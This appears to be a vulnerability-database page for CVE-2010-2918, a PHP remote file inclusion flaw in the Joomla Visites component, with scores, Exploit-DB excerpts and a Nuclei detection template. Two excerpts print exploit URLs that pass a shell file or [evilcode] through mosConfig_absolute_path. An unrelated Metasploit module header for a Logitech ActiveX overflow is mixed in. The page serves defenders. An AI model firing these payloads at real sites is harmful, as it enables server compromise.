CVE-2010-2918
Published 2010-07-30
CVE-2010-2918: PHP remote file inclusion vulnerability in core/include/myMailer.class.php in the Visites (com_joomla-visites) component 1.1 RC2 for Joomla! allows remote…
Priority P356 · high · 7.5 (CVSS 2.0)
AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 13.70% (96.0th percentile)
PHP remote file inclusion vulnerability in core/include/myMailer.class.php in the Visites (com_joomla-visites) component 1.1 RC2 for Joomla! allows remote attackers to execute arbitrary PHP code via a URL in the mosConfig_absolute_path parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| visocrea | com_joomla_visites | — | — |
No detection rules found.
Exploit-DB
Joomla! Component Visites 1.1 RC2 - Remote File Inclusion
exploitdb·2010-07-26
CVE-2010-2918 Joomla! Component Visites 1.1 RC2 - Remote File Inclusion
---
Joomla Component(com_joomla-visites) RFI
Pal-Li0ns Cr3w , HacKTeach LoverzZ
+===================================================================================+
[?]Joomla Component(com_joomla-visites) RFI
+===================================================================================+
[?] My home: [HacKTeach.org & Pal-Li0ns.com ]
[?] For Ask: [[email protected] ]
[?] Script: [ joomla ]
[?] home Script [ http://www.joomla.it ]
[?] Language: [ PHP ]
[?] Founder: [ Li0n-PaL ]
[?] Greatz to: [ Pal-Li0n - Red-D3v1L - ShaDow-D3v1L - Cold-z3ro - storm - Mr.NJ -]
===[ Exploit ]===
http://localhost//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=[shell.txt?]
DeMo ~
http://ww
Exploit-DB
Logitech VideoCall - ActiveX Control Buffer Overflow (Metasploit)
exploitdb·2010-05-09
CVE-2007-2918 Logitech VideoCall - ActiveX Control Buffer Overflow (Metasploit)
---
##
# $Id: logitechvideocall_start.rb 9262 2010-05-09 17:45:00Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Logitech VideoCall ActiveX Control Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the Logitech VideoCall ActiveX
Control (wcamxmp.dll 2.0.3470.448). By sending an overly long string to the
"Start()" method, an attacker may be able to execute arbitrary code.
},
'License' => MSF_LICENSE,
'Author' => [ 'MC' ],
'Version'
Exploit-DB
Joomla! Component Visites 1.1 - MosConfig_absolute_path Remote File Inclusion
exploitdb·2008-04-26
CVE-2010-2918 Joomla! Component Visites 1.1 - MosConfig_absolute_path Remote File Inclusion
---
source: https://www.securityfocus.com/bid/28942/info
The Visites component for Joomla! is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input.
Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Visites 1.1 RC2 is vulnerable; other versions may also be affected.
http://www.example.com/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=[evilcode]
Nuclei
Joomla! Component Visites 1.1 - MosConfig_absolute_path Remote File Inclusion
nuclei·CVSS 7.5
CVE-2010-2918 [HIGH] Joomla! Component Visites 1.1 - MosConfig_absolute_path Remote File Inclusion
A PHP remote file inclusion vulnerability in core/include/myMailer.class.php in the Visites (com_joomla-visites) component 1.1 RC2 for Joomla! allows remote attackers to execute arbitrary PHP code via a URL in the mosConfig_absolute_path parameter.
Template:
id: CVE-2010-2918
info:
  name: Joomla! Component Visites 1.1 - MosConfig_absolute_path Remote File Inclusion
  author: daffainfo
  severity: high
  description: A PHP remote file inclusion vulnerability in core/include/myMailer.class.php in the Visites (com_joomla-visites) component 1.1 RC2 for Joomla! allows remote attackers to execute arbitrary PHP code via a URL in the mosConfig_absolute_path parameter.
  impact: |
    Remote file inclusion vulnerability in Joomla!
http://packetstormsecurity.org/0804-exploits/joomlavisites-rfi.txt
http://www.exploit-db.com/exploits/14476
http://www.securityfocus.com/bid/28942
http://www.vupen.com/english/advisories/2010/1925
https://exchange.xforce.ibmcloud.com/vulnerabilities/42025
Published: 2010-07-30